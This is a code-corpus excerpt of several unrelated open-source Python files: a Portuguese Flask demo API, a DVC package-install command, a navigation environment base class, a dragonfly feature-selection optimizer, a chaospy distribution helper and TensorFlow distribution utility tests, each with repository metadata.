] | 2 | 2021-11-06T15:12:22.000Z | 2022-02-28T22:43:42.000Z | flask_api.py | IK-R-S/flask-api | fd5b1b56181c9272e62326a064e6c10eb2727db3 | [
"MIT"
] | null | null | null | flask_api.py | IK-R-S/flask-api | fd5b1b56181c9272e62326a064e6c10eb2727db3 | [
"MIT"
] | null | null | null | import requests
from flask import Flask, request, jsonify
app = Flask(__name__)
@app.route("/")
def home():
    """Landing page: static HTML listing the example routes of this demo API."""
    return """
    <h1>Bem vindo ao exemplo básico de API com Flask!</h1>
    <p>Nesse exemplo você pode explorar as seguintes rotas, algumas delas com parâmetros:</p>
    <li><a href="/olamundo">Olá mundo no flask 🌎</a></li>
    <li><a href="/boasvindas/">Boas vindas dinâmico 😃</a></li>
    <li><a href="/soma/">Soma de 2 números 🔢</a></li>
    <li><a href="/jsoncalc/">Resposta em JSON 📃</a></li>
    <text style="margin-top: 10">by: @IK.R.S</text>
    """
@app.route("/olamundo/")
def hello():
    # Classic hello-world endpoint (response text is in Portuguese).
    return "Olá mundo"
@app.route("/boasvindas/")
def boasvindas():
    # Usage hint shown when no name segment is supplied after /boasvindas/.
    return "Escreva seu nome no endereço. exemplo: http://127.0.0.1:4444/boasvindas/Maria"
@app.route("/boasvindas/<nome>")
def bemvindo(nome):
    # Greets the caller with the name captured from the URL path.
    return f"Olá {nome}, seja bem vindo a API Flask!"
@app.route("/soma/")
def sum():
    # NOTE(review): this view shadows the builtin `sum` at module level;
    # consider renaming. The route itself is unaffected unless some template
    # elsewhere relies on url_for("sum") — verify before renaming.
    return """
    <h2>Para somar escreva os números no endereço da seguinte forma: http://127.0.0.1:4444/soma/1/2</h3>
    <p1>Neste exemplo os número foram 1 e 2; veja com 3 e 4: http://127.0.0.1:222/soma/3/4</p1>
    """
@app.route("/soma/<n1>/<n2>")
def sumnum(n1, n2):
    """Return the sum of the two integers captured from the URL path.

    Note: int() raises ValueError (-> HTTP 500) for non-numeric segments.
    """
    # Renamed the local from `sum` so the builtin is not shadowed inside the view.
    total = int(n1) + int(n2)
    return f"SOMA ENTRE {n1} E {n2} = {total}"
@app.route("/jsoncalc/")
def jsoncalc():
    # Usage hint for the parameterised /jsoncalc/<n1>/<n2> endpoint below.
    return """
    <h2>Para receber os dados em JSON escreva os números no endereço da seguinte forma: http://127.0.0.1:4444/jsoncalc/1/2</h3>
    <p1>Neste exemplo os número foram 1 e 2; veja com 3 e 4: http://127.0.0.1:222/jsoncalc/3/4</p1>
    """
@app.route("/jsoncalc/<n1>/<n2>")
def calc(n1, n2):
    """Return sum, difference, product and quotient of the two URL integers as JSON.

    Bug fix: dividing by zero previously raised ZeroDivisionError (an HTTP 500);
    the "divisao" field is now null when n2 == 0.
    """
    a = int(n1)
    b = int(n2)
    return jsonify({
        "soma": a + b,
        "subtracao": a - b,
        "multiplicacao": a * b,
        # Guard against ZeroDivisionError for /jsoncalc/<x>/0.
        "divisao": a / b if b != 0 else None,
    })
# Pass the port as an int rather than relying on Flask's implicit int() conversion
# of string ports; debug stays off.
app.run(port=4444, debug=False)
| 28.921875 | 127 | 0.615343 |
7b2bccc0f9db1d3a3646604f94ac9c330a27494b | 2,674 | py | Python | dvc/command/pkg.py | zb0th/dvc | 5fdbc1882f73162419d5b84ed47a33e9e321f151 | [
"Apache-2.0"
] | 1 | 2020-07-25T08:23:32.000Z | 2020-07-25T08:23:32.000Z | dvc/command/pkg.py | aliseramirez/dvc | 92cc9f7e6f19f3b92f43e28131fe50c20b297214 | [
"Apache-2.0"
] | null | null | null | dvc/command/pkg.py | aliseramirez/dvc | 92cc9f7e6f19f3b92f43e28131fe50c20b297214 | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
import argparse
import logging
from dvc.exceptions import DvcException
from dvc.command.base import CmdBase, fix_subparsers, append_doc_link
logger = logging.getLogger(__name__)
class CmdPkgInstall(CmdBase):
    """Command handler for `dvc pkg install`."""

    def run(self):
        """Install the package named in the parsed CLI arguments.

        Returns:
            int: 0 on success, 1 if the installation raised a DvcException.
        """
        try:
            self.repo.pkg.install(
                self.args.address,
                self.args.target_dir,
                self.args.select,
                self.args.file,
            )
        except DvcException:
            # logger.exception records the traceback along with the message.
            logger.exception(
                "failed to install package '{}'".format(self.args.address)
            )
            return 1
        return 0
def add_parser(subparsers, parent_parser):
    """Register the `pkg` command group and its `install` sub-command.

    Args:
        subparsers: argparse sub-parsers collection of the top-level CLI.
        parent_parser: shared parent parser carrying the global options.
    """
    # Imported here (not at module top) to avoid a circular import with dvc.command.config.
    from dvc.command.config import parent_config_parser

    PKG_HELP = "Manage DVC packages."
    pkg_parser = subparsers.add_parser(
        "pkg",
        parents=[parent_parser],
        description=append_doc_link(PKG_HELP, "pkg"),
        formatter_class=argparse.RawDescriptionHelpFormatter,
        add_help=False,
    )
    pkg_subparsers = pkg_parser.add_subparsers(
        dest="cmd", help="Use dvc pkg CMD --help for command-specific help."
    )
    # Work around argparse quirks with optional sub-commands.
    fix_subparsers(pkg_subparsers)
    PKG_INSTALL_HELP = "Install package."
    pkg_install_parser = pkg_subparsers.add_parser(
        "install",
        parents=[parent_config_parser, parent_parser],
        description=append_doc_link(PKG_INSTALL_HELP, "pkg-install"),
        help=PKG_INSTALL_HELP,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    pkg_install_parser.add_argument(
        "address",
        nargs="?",
        default="",
        help="Package address: git://<url> or https://github.com/...",
    )
    pkg_install_parser.add_argument(
        "target_dir",
        metavar="target",
        nargs="?",
        default=".",
        help="Target directory to deploy package outputs. "
        "Default value is the current dir.",
    )
    pkg_install_parser.add_argument(
        "-s",
        "--select",
        metavar="OUT",
        action="append",
        default=[],
        help="Select and persist only specified outputs from a package. "
        "The parameter can be used multiple times. "
        "All outputs will be selected by default.",
    )
    pkg_install_parser.add_argument(
        "-f",
        "--file",
        help="Specify name of the stage file. It should be "
        "either 'Dvcfile' or have a '.dvc' suffix (e.g. "
        "'prepare.dvc', 'clean.dvc', etc). "
        "By default the file has 'mod_' prefix and imported package name "
        "followed by .dvc",
    )
    # Dispatch `dvc pkg install` to the CmdPkgInstall handler above.
    pkg_install_parser.set_defaults(func=CmdPkgInstall)
| 29.711111 | 76 | 0.618175 |
1444af2072201f142ac237687dca77258cdf9cdf | 1,843 | py | Python | gennav/envs/base.py | threewisemonkeys-as/gennav | 41e86b841a0ce44402f31debc65d5c82109b13a3 | [
"MIT"
] | null | null | null | gennav/envs/base.py | threewisemonkeys-as/gennav | 41e86b841a0ce44402f31debc65d5c82109b13a3 | [
"MIT"
] | null | null | null | gennav/envs/base.py | threewisemonkeys-as/gennav | 41e86b841a0ce44402f31debc65d5c82109b13a3 | [
"MIT"
] | null | null | null | class Environment(object):
"""
Base class for an envrionment.
An environment object should encapsulate all data processing
related to a specific environment representation and should
provide the ability to check for collision using this API
"""
def get_status(self, state):
""" Get whether a given state is valid within the environment.
This method needs to be implemented in the specific env implementation.
Args:
state (gennav.utils.RobotState): State to be checked
Returns:
bool: True if state is valid otherwise False
"""
raise NotImplementedError
def get_traj_status(self, traj):
""" Get whether a given trajectory is valid within the environment.
This method needs to be implemented in the specific env implementation.
Args:
state (gennav.utils.Trajectory): Trajectory to be checked
Returns:
bool: True if state is valid otherwise False
"""
raise NotImplementedError
def update(self, *args, **kwargs):
""" Update the environment.
This method needs to be implemented in the specific env implementation.
Args:
*args: Variable length argument list.
**kwargs: Arbitrary keyword arguments.
"""
raise NotImplementedError
def nearest_obstacle_distance(self, state, *args, **kwargs):
""" Get the distacne to nearest obstacle.
This method needs to be implemented in the specific env implementation
Args:
state (gennav.utils.common.RobotState) : The current state of the robot.
*args: Variable length argument list
**kwargs: Variable length keyword arguments.
"""
raise NotImplementedError
| 30.716667 | 84 | 0.640803 |
108fb0a494ed3eeac305be8125ced8fbd2efd592 | 7,667 | py | Python | zoofs/dragonflyoptimization.py | ganesh3/zoofs | 8f2109b5316d4b1ab42f25419dd80ae1d0582e89 | [
"Apache-2.0"
] | null | null | null | zoofs/dragonflyoptimization.py | ganesh3/zoofs | 8f2109b5316d4b1ab42f25419dd80ae1d0582e89 | [
"Apache-2.0"
] | null | null | null | zoofs/dragonflyoptimization.py | ganesh3/zoofs | 8f2109b5316d4b1ab42f25419dd80ae1d0582e89 | [
"Apache-2.0"
] | null | null | null | import plotly.graph_objects as go
from zoofs.baseoptimizationalgorithm import BaseOptimizationAlgorithm
import numpy as np
import pandas as pd
import logging as log
class DragonFlyOptimization(BaseOptimizationAlgorithm):
    """
    Dragon Fly Optimization for feature selection.

    Each "individual" is a binary mask over the feature columns; the swarm of
    masks is evolved using separation/alignment/cohesion/food/enemy forces.

    Parameters
    ----------
    objective_function: user made function of the signature 'func(model,X_train,y_train,X_test,y_test)'
        User defined function that returns the objective value
    population_size: int, default=50
        Total size of the population
    n_iteration: int, default=50
        Number of times the Dragon Fly Optimization algorithm will run
    minimize : bool, default=True
        Defines if the objective value is to be maximized or minimized

    Attributes
    ----------
    best_feature_list : ndarray of shape (n_features)
        list of features with the best result of the entire run
    """

    def __init__(self, objective_function, n_iteration=50, population_size=50, minimize=True):
        super().__init__(objective_function, n_iteration, population_size, minimize)

    def evaluate_fitness(self, model, X_train, y_train, X_valid, y_valid):
        """Score every individual (feature mask) and update best/worst trackers.

        Returns:
            list: One objective score per individual (negated when maximizing,
            so that lower is always better internally).
        """
        scores = []
        for i, individual in enumerate(self.individuals):
            # Select the columns whose bit is set in this individual's mask.
            chosen_features = [index for index in range(X_train.shape[1]) if individual[index] == 1]
            X_train_copy = X_train.iloc[:, chosen_features]
            X_valid_copy = X_valid.iloc[:, chosen_features]
            score = self.objective_function(model, X_train_copy, y_train, X_valid_copy, y_valid)
            if not (self.minimize):
                # Negate so the rest of the algorithm can always minimize.
                score = -score
            if score < self.best_score:
                self.best_score = score
                self.best_score_dimension = individual
                self.best_dim = individual
            if score > self.worst_score:
                self.worst_score = score
                self.worst_dim = individual
            scores.append(score)
        return scores

    def _check_params(self, model, X_train, y_train, X_valid, y_valid, method):
        """Validate common parameters plus the DFO-specific `method` choice.

        Note: 'quadraic' is a historical misspelling of 'quadratic' kept for
        backward compatibility with existing callers.
        """
        super()._check_params(model, X_train, y_train, X_valid, y_valid)
        if method not in ['linear', 'random', 'quadraic', 'sinusoidal']:
            # BUG FIX: the original message omitted 'sinusoidal', which is the
            # default value of `method` in fit().
            raise ValueError("method accepts only linear, random, quadraic and sinusoidal types")

    def fit(self, model, X_train, y_train, X_valid, y_valid, method='sinusoidal', verbose=True):
        """
        Run the Dragon Fly Optimization feature search.

        Parameters
        ----------
        model :
            machine learning model's object
        X_train : pandas.core.frame.DataFrame of shape (n_samples, n_features)
            Training input samples to be used for machine learning model
        y_train : pandas.core.frame.DataFrame or pandas.core.series.Series of shape (n_samples)
            The target values (class labels in classification, real numbers in regression).
        X_valid : pandas.core.frame.DataFrame of shape (n_samples, n_features)
            Validation input samples
        y_valid : pandas.core.frame.DataFrame or pandas.core.series.Series of shape (n_samples)
            The target values (class labels in classification, real numbers in regression).
        method : {'linear','random','quadraic','sinusoidal'}, default='sinusoidal'
            Choose between the four weight-adaption schedules of Dragon Fly
            optimization ('quadraic' is a kept misspelling of 'quadratic').
        verbose : bool, default=True
            Print results for iterations

        Returns
        -------
        list
            Column names of the best feature subset found.
        """
        self._check_params(model, X_train, y_train, X_valid, y_valid, method)
        # Number of neighbours used for the swarm forces (all other individuals).
        kbest = self.population_size - 1
        self.feature_list = np.array(list(X_train.columns))
        self.best_results_per_iteration = {}
        self.best_score = np.inf
        self.worst_score = -np.inf
        self.worst_dim = np.ones(X_train.shape[1])
        self.best_dim = np.ones(X_train.shape[1])
        self.best_score_dimension = np.ones(X_train.shape[1])
        # Step vectors ("velocities") of the dragonflies, one row per individual.
        delta_x = np.random.randint(0, 2, size=(self.population_size, X_train.shape[1]))
        self.initialize_population(X_train)
        for i in range(self.n_iteration):
            self._check_individuals()
            self.fitness_scores = self.evaluate_fitness(model, X_train, y_train, X_valid, y_valid)
            self.iteration_objective_score_monitor(i)
            # Per-iteration coefficient schedules. The roles match the forces
            # combined below: s=separation, a=alignment, c=cohesion,
            # f=food (best) attraction, e=enemy (worst) distraction, w=inertia.
            if method == 'linear':
                s = 0.2 - (0.2 * ((i + 1) / self.n_iteration))
                e = 0.1 - (0.1 * ((i + 1) / self.n_iteration))
                a = 0.0 + (0.2 * ((i + 1) / self.n_iteration))
                c = 0.0 + (0.2 * ((i + 1) / self.n_iteration))
                f = 0.0 + (2 * ((i + 1) / self.n_iteration))
                w = 0.9 - (i + 1) * (0.5) / (self.n_iteration)
            if method == 'random':
                if 2 * (i + 1) <= self.n_iteration:
                    pct = 0.1 - (0.2 * (i + 1) / self.n_iteration)
                else:
                    pct = 0
                w = 0.9 - (i + 1) * (0.5) / (self.n_iteration)
                s = 2 * np.random.random() * pct
                a = 2 * np.random.random() * pct
                c = 2 * np.random.random() * pct
                f = 2 * np.random.random()
                e = pct
            if method == 'quadraic':
                w = 0.9 - (i + 1) * (0.5) / (self.n_iteration)
                s = 0.2 - (0.2 * ((i + 1) / self.n_iteration)) ** 2
                e = 0.1 - (0.1 * ((i + 1) / self.n_iteration)) ** 2
                a = 0.0 + (0.2 * ((i + 1) / self.n_iteration)) ** 2
                c = 0.0 + (0.2 * ((i + 1) / self.n_iteration)) ** 2
                f = 0.0 + (2 * (i + 1) / self.n_iteration) ** 2
            if method == 'sinusoidal':
                beta = 0.5
                w = 0.9 - (i + 1) * (0.5) / (self.n_iteration)
                s = 0.10 + 0.10 * np.abs(np.cos(((i + 1) / self.n_iteration) * (4 * np.pi - beta * np.pi)))
                e = 0.05 + 0.05 * np.abs(np.cos(((i + 1) / self.n_iteration) * (4 * np.pi - beta * np.pi)))
                a = 0.10 - 0.05 * np.abs(np.cos(((i + 1) / self.n_iteration) * (4 * np.pi - beta * np.pi)))
                c = 0.10 - 0.05 * np.abs(np.cos(((i + 1) / self.n_iteration) * (4 * np.pi - beta * np.pi)))
                f = 2 - 1 * np.abs(np.cos(((i + 1) / self.n_iteration) * (4 * np.pi - beta * np.pi)))
            temp = individuals = self.individuals
            # Pairwise squared differences between every pair of individuals,
            # summed over features -> (pop, pop) squared-distance matrix.
            temp_2 = (((temp.reshape(temp.shape[0], 1, temp.shape[1]) - temp.reshape(1, temp.shape[0], temp.shape[1])).reshape(temp.shape[0] ** 2, temp.shape[1]) ** 2))
            temp_3 = temp_2.reshape(temp.shape[0], temp.shape[0], temp.shape[1]).sum(axis=2)
            zz = np.argsort(temp_3)
            # Neighbour indices per individual, sorted by distance, self removed.
            cc = [list(iter1[iter1 != iter2]) for iter1, iter2 in zip(zz, np.arange(temp.shape[0]))]
            Si = -(np.repeat(individuals, kbest, axis=0).reshape(individuals.shape[0], kbest, individuals.shape[1]) - individuals[np.array(cc)[:, :kbest]]).sum(axis=1)
            Ai = delta_x[np.array(cc)[:, :kbest]].sum(axis=1) / kbest
            Ci = (individuals[np.array(cc)[:, :kbest]].sum(axis=1) / kbest) - individuals
            Fi = self.best_score_dimension - self.individuals
            Ei = self.individuals + self.worst_dim
            delta_x = s * Si + a * Ai + c * Ci + f * Fi + e * Ei + w * delta_x
            # Clamp step vectors to keep the transfer function in a sane range.
            delta_x = np.where(delta_x > 6, 6, delta_x)
            delta_x = np.where(delta_x < -6, -6, delta_x)
            # V-shaped transfer function: probability of flipping each bit.
            T = abs(delta_x / np.sqrt(1 + delta_x ** 2))
            self.individuals = np.where(np.random.uniform(size=(self.population_size, X_train.shape[1])) < T, np.logical_not(self.individuals).astype(int), individuals)
            self.verbose_results(verbose, i)
            self.best_feature_list = list(self.feature_list[np.where(self.best_dim)[0]])
        return self.best_feature_list
| 45.636905 | 161 | 0.589018 |
ab6a5a018d17bea76d1611f7e1b8a162e26e3f07 | 2,107 | py | Python | chaospy/descriptives/quantity_of_interest.py | agonzs11/Polinomio-del-caos | 5a415ece07e6535488174bac69a6c0fcc2ca272d | [
"MIT"
] | 1 | 2020-04-29T20:53:25.000Z | 2020-04-29T20:53:25.000Z | chaospy/descriptives/quantity_of_interest.py | agonzs11/Polinomio-del-caos | 5a415ece07e6535488174bac69a6c0fcc2ca272d | [
"MIT"
] | null | null | null | chaospy/descriptives/quantity_of_interest.py | agonzs11/Polinomio-del-caos | 5a415ece07e6535488174bac69a6c0fcc2ca272d | [
"MIT"
] | null | null | null | import numpy
from .. import distributions, poly as polynomials
from ..external import SampleDist
def QoI_Dist(poly, dist, sample=10000, **kws):
    """
    Constructs distributions for the quantities of interest.

    The function constructs a kernel density estimator (KDE) for each
    polynomial (poly) by sampling it. With the KDEs, distributions (Dists) are
    constructed. The Dists can be used for e.g. plotting probability density
    functions (PDF), or to make a second uncertainty quantification simulation
    with that newly generated Dists.

    Args:
        poly (chaospy.poly.ndpoly):
            Polynomial of interest.
        dist (Dist):
            Defines the space where the samples for the KDE is taken from the
            poly.
        sample (int):
            Number of samples used in estimation to construct the KDE.
        **kws:
            Forwarded verbatim to ``dist.sample`` (e.g. the sampling rule).

    Returns:
        (numpy.ndarray):
            The constructed quantity of interest (QoI) distributions, where
            ``qoi_dists.shape==poly.shape``.

    Examples:
        >>> dist = chaospy.Normal(0, 1)
        >>> x = chaospy.variable(1)
        >>> poly = chaospy.polynomial([x])
        >>> qoi_dist = chaospy.QoI_Dist(poly, dist)
        >>> values = qoi_dist[0].pdf([-0.75, 0., 0.75])
        >>> values.round(8)
        array([0.29143037, 0.39931708, 0.29536329])
    """
    # Remember the original shape so the result can be reshaped to match.
    shape = poly.shape
    poly = poly.flatten()
    dim = len(dist)
    # sample from the input dist
    samples = dist.sample(sample, **kws)
    qoi_dists = []
    for i in range(0, len(poly)):
        # sample the polynomial solution
        # NOTE(review): for dim > 1, `samples` presumably has one row per
        # dimension, hence the star-unpacking — confirm against dist.sample.
        if dim == 1:
            dataset = poly[i](samples)
        else:
            dataset = poly[i](*samples)
        # Support bounds for the KDE are taken from the sampled data itself.
        lo = dataset.min()
        up = dataset.max()
        # creates qoi_dist
        qoi_dist = SampleDist(dataset, lo, up)
        qoi_dists.append(qoi_dist)
    # reshape the qoi_dists to match the shape of the input poly
    qoi_dists = numpy.array(qoi_dists, distributions.Dist)
    qoi_dists = qoi_dists.reshape(shape)
    if not shape:
        # Scalar polynomial: unwrap the 0-d array to a single Dist.
        qoi_dists = qoi_dists.item()
    return qoi_dists
| 30.1 | 79 | 0.619364 |
b5d041c8c768aa936280fc7e3b3ce1c0ff239740 | 11,301 | py | Python | tensorflow/contrib/distributions/python/kernel_tests/distribution_util_test.py | toptaldev92/tensorflow | 1fd1f65d1b0896149e44a1f105267c27994010d9 | [
"Apache-2.0"
] | 2 | 2019-07-05T15:17:01.000Z | 2020-04-16T07:25:56.000Z | tensorflow/contrib/distributions/python/kernel_tests/distribution_util_test.py | kiliczsh/tensorflow | f49aca4532c155597c669cf2189f211cafbebf96 | [
"Apache-2.0"
] | 1 | 2021-04-12T03:51:59.000Z | 2021-04-12T03:51:59.000Z | tensorflow/contrib/distributions/python/kernel_tests/distribution_util_test.py | kiliczsh/tensorflow | f49aca4532c155597c669cf2189f211cafbebf96 | [
"Apache-2.0"
] | 1 | 2021-04-22T09:17:52.000Z | 2021-04-22T09:17:52.000Z | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for utility functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import special
import tensorflow as tf
from tensorflow.contrib.distributions.python.ops import distribution_util
class DistributionUtilTest(tf.test.TestCase):
  """Unit tests for the helpers in contrib.distributions distribution_util.

  Covers: assert_close / assert_integer_form validation ops,
  get_logits_and_prob conversions (with and without validation),
  log_combinations, rotate_transpose, and pick_vector.
  All tests run in TF1 graph mode via self.test_session().
  """

  def testAssertCloseIntegerDtype(self):
    x = [1, 5, 10, 15, 20]
    y = x
    z = [2, 5, 10, 15, 20]
    with self.test_session():
      with tf.control_dependencies([distribution_util.assert_close(x, y)]):
        tf.identity(x).eval()
      with tf.control_dependencies([distribution_util.assert_close(y, x)]):
        tf.identity(x).eval()
      with self.assertRaisesOpError("Condition x ~= y"):
        with tf.control_dependencies([distribution_util.assert_close(x, z)]):
          tf.identity(x).eval()
      with self.assertRaisesOpError("Condition x ~= y"):
        with tf.control_dependencies([distribution_util.assert_close(y, z)]):
          tf.identity(y).eval()

  def testAssertCloseNonIntegerDtype(self):
    x = np.array([1., 5, 10, 15, 20], dtype=np.float32)
    # y differs from x by less than the closeness tolerance, so it passes.
    y = x + 1e-8
    z = [2., 5, 10, 15, 20]
    with self.test_session():
      with tf.control_dependencies([distribution_util.assert_close(x, y)]):
        tf.identity(x).eval()
      with tf.control_dependencies([distribution_util.assert_close(y, x)]):
        tf.identity(x).eval()
      with self.assertRaisesOpError("Condition x ~= y"):
        with tf.control_dependencies([distribution_util.assert_close(x, z)]):
          tf.identity(x).eval()
      with self.assertRaisesOpError("Condition x ~= y"):
        with tf.control_dependencies([distribution_util.assert_close(y, z)]):
          tf.identity(y).eval()

  def testAssertCloseEpsilon(self):
    x = [0., 5, 10, 15, 20]
    # x != y
    y = [0.1, 5, 10, 15, 20]
    # x = z
    z = [1e-8, 5, 10, 15, 20]
    with self.test_session():
      with tf.control_dependencies([distribution_util.assert_close(x, z)]):
        tf.identity(x).eval()
      with self.assertRaisesOpError("Condition x ~= y"):
        with tf.control_dependencies([distribution_util.assert_close(x, y)]):
          tf.identity(x).eval()
      with self.assertRaisesOpError("Condition x ~= y"):
        with tf.control_dependencies([distribution_util.assert_close(y, z)]):
          tf.identity(y).eval()

  def testAssertIntegerForm(self):
    # This should only be detected as an integer.
    x = [1., 5, 10, 15, 20]
    y = [1.1, 5, 10, 15, 20]
    # First component isn't less than float32.eps = 1e-7
    z = [1.0001, 5, 10, 15, 20]
    # This shouldn"t be detected as an integer.
    w = [1e-8, 5, 10, 15, 20]
    with self.test_session():
      with tf.control_dependencies([distribution_util.assert_integer_form(x)]):
        tf.identity(x).eval()
      with self.assertRaisesOpError("x has non-integer components"):
        with tf.control_dependencies([
            distribution_util.assert_integer_form(y)]):
          tf.identity(y).eval()
      with self.assertRaisesOpError("x has non-integer components"):
        with tf.control_dependencies([
            distribution_util.assert_integer_form(z)]):
          tf.identity(z).eval()
      with self.assertRaisesOpError("x has non-integer components"):
        with tf.control_dependencies([
            distribution_util.assert_integer_form(w)]):
          tf.identity(w).eval()

  def testGetLogitsAndProbImproperArguments(self):
    # Exactly one of `logits` / `p` must be supplied.
    with self.test_session():
      with self.assertRaises(ValueError):
        distribution_util.get_logits_and_prob(logits=None, p=None)
      with self.assertRaises(ValueError):
        distribution_util.get_logits_and_prob(logits=[0.1], p=[0.1])

  def testGetLogitsAndProbLogits(self):
    p = np.array([0.01, 0.2, 0.5, 0.7, .99], dtype=np.float32)
    logits = special.logit(p)
    with self.test_session():
      new_logits, new_p = distribution_util.get_logits_and_prob(
          logits=logits, validate_args=True)
      self.assertAllClose(p, new_p.eval())
      self.assertAllClose(logits, new_logits.eval())

  def testGetLogitsAndProbLogitsMultidimensional(self):
    p = np.array([0.2, 0.3, 0.5], dtype=np.float32)
    # In the multidimensional case logits are plain logs, not logit(p).
    logits = np.log(p)
    with self.test_session():
      new_logits, new_p = distribution_util.get_logits_and_prob(
          logits=logits, multidimensional=True, validate_args=True)
      self.assertAllClose(new_p.eval(), p)
      self.assertAllClose(new_logits.eval(), logits)

  def testGetLogitsAndProbProbability(self):
    p = np.array([0.01, 0.2, 0.5, 0.7, .99], dtype=np.float32)
    with self.test_session():
      new_logits, new_p = distribution_util.get_logits_and_prob(
          p=p, validate_args=True)
      self.assertAllClose(special.logit(p), new_logits.eval())
      self.assertAllClose(p, new_p.eval())

  def testGetLogitsAndProbProbabilityMultidimensional(self):
    p = np.array([[0.3, 0.4, 0.3], [0.1, 0.5, 0.4]], dtype=np.float32)
    with self.test_session():
      new_logits, new_p = distribution_util.get_logits_and_prob(
          p=p, multidimensional=True, validate_args=True)
      self.assertAllClose(np.log(p), new_logits.eval())
      self.assertAllClose(p, new_p.eval())

  def testGetLogitsAndProbProbabilityValidateArgs(self):
    p = [0.01, 0.2, 0.5, 0.7, .99]
    # Component less than 0.
    p2 = [-1, 0.2, 0.5, 0.3, .2]
    # Component greater than 1.
    p3 = [2, 0.2, 0.5, 0.3, .2]
    with self.test_session():
      _, prob = distribution_util.get_logits_and_prob(p=p, validate_args=True)
      prob.eval()
      with self.assertRaisesOpError("Condition x >= 0"):
        _, prob = distribution_util.get_logits_and_prob(
            p=p2, validate_args=True)
        prob.eval()
      # With validation off, invalid probabilities are accepted silently.
      _, prob = distribution_util.get_logits_and_prob(p=p2, validate_args=False)
      prob.eval()
      with self.assertRaisesOpError("p has components greater than 1"):
        _, prob = distribution_util.get_logits_and_prob(
            p=p3, validate_args=True)
        prob.eval()
      _, prob = distribution_util.get_logits_and_prob(p=p3, validate_args=False)
      prob.eval()

  def testGetLogitsAndProbProbabilityValidateArgsMultidimensional(self):
    p = np.array([[0.3, 0.4, 0.3], [0.1, 0.5, 0.4]], dtype=np.float32)
    # Component less than 0. Still sums to 1.
    p2 = np.array([[-.3, 0.4, 0.9], [0.1, 0.5, 0.4]], dtype=np.float32)
    # Component greater than 1. Does not sum to 1.
    p3 = np.array([[1.3, 0.0, 0.0], [0.1, 0.5, 0.4]], dtype=np.float32)
    # Does not sum to 1.
    p4 = np.array([[1.1, 0.3, 0.4], [0.1, 0.5, 0.4]], dtype=np.float32)
    with self.test_session():
      _, prob = distribution_util.get_logits_and_prob(
          p=p, multidimensional=True)
      prob.eval()
      with self.assertRaisesOpError("Condition x >= 0"):
        _, prob = distribution_util.get_logits_and_prob(
            p=p2, multidimensional=True, validate_args=True)
        prob.eval()
      _, prob = distribution_util.get_logits_and_prob(
          p=p2, multidimensional=True, validate_args=False)
      prob.eval()
      with self.assertRaisesOpError(
          "(p has components greater than 1|p does not sum to 1)"):
        _, prob = distribution_util.get_logits_and_prob(
            p=p3, multidimensional=True, validate_args=True)
        prob.eval()
      _, prob = distribution_util.get_logits_and_prob(
          p=p3, multidimensional=True, validate_args=False)
      prob.eval()
      with self.assertRaisesOpError("p does not sum to 1"):
        _, prob = distribution_util.get_logits_and_prob(
            p=p4, multidimensional=True, validate_args=True)
        prob.eval()
      _, prob = distribution_util.get_logits_and_prob(
          p=p4, multidimensional=True, validate_args=False)
      prob.eval()

  def testLogCombinationsBinomial(self):
    n = [2, 5, 12, 15]
    k = [1, 2, 4, 11]
    # Reference values from scipy's binomial coefficient.
    log_combs = np.log(special.binom(n, k))
    with self.test_session():
      n = np.array(n, dtype=np.float32)
      counts = [[1., 1], [2., 3], [4., 8], [11, 4]]
      log_binom = distribution_util.log_combinations(n, counts)
      self.assertEqual([4], log_binom.get_shape())
      self.assertAllClose(log_combs, log_binom.eval())

  def testLogCombinationsShape(self):
    # Shape [2, 2]
    n = [[2, 5], [12, 15]]
    with self.test_session():
      n = np.array(n, dtype=np.float32)
      # Shape [2, 2, 4]
      counts = [[[1., 1, 0, 0], [2., 2, 1, 0]], [[4., 4, 1, 3], [10, 1, 1, 4]]]
      log_binom = distribution_util.log_combinations(n, counts)
      self.assertEqual([2, 2], log_binom.get_shape())

  # NumPy reference implementation used by the rotate_transpose tests below.
  def _np_rotate_transpose(self, x, shift):
    if not isinstance(x, np.ndarray):
      x = np.array(x)
    return np.transpose(x, np.roll(np.arange(len(x.shape)), shift))

  def testRollStatic(self):
    with self.test_session():
      with self.assertRaisesRegexp(
          ValueError, "None values not supported."):
        distribution_util.rotate_transpose(None, 1)
      for x in (np.ones(1), np.ones((2, 1)), np.ones((3, 2, 1))):
        for shift in np.arange(-5, 5):
          y = distribution_util.rotate_transpose(x, shift)
          self.assertAllEqual(self._np_rotate_transpose(x, shift),
                              y.eval())
          self.assertAllEqual(np.roll(x.shape, shift),
                              y.get_shape().as_list())

  def testRollDynamic(self):
    # Same as testRollStatic, but with shapes unknown until session run time.
    with self.test_session() as sess:
      x = tf.placeholder(tf.float32)
      shift = tf.placeholder(tf.int32)
      for x_value in (np.ones(1, dtype=x.dtype.as_numpy_dtype()),
                      np.ones((2, 1), dtype=x.dtype.as_numpy_dtype()),
                      np.ones((3, 2, 1), dtype=x.dtype.as_numpy_dtype())):
        for shift_value in np.arange(-5, 5):
          self.assertAllEqual(
              self._np_rotate_transpose(x_value, shift_value),
              sess.run(distribution_util.rotate_transpose(x, shift),
                       feed_dict={x: x_value, shift: shift_value}))

  def testChooseVector(self):
    with self.test_session():
      x = np.arange(10, 12)
      y = np.arange(15, 18)
      self.assertAllEqual(
          x, distribution_util.pick_vector(
              tf.less(0, 5), x, y).eval())
      self.assertAllEqual(
          y, distribution_util.pick_vector(
              tf.less(5, 0), x, y).eval())
      # With a constant predicate pick_vector short-circuits and returns the
      # original numpy array, so no .eval() is needed.
      self.assertAllEqual(
          x, distribution_util.pick_vector(
              tf.constant(True), x, y))  # No eval.
      self.assertAllEqual(
          y, distribution_util.pick_vector(
              tf.constant(False), x, y))  # No eval.
# Run the test suite when this module is executed directly.
if __name__ == "__main__":
  tf.test.main()
| 36.931373 | 80 | 0.637377 |
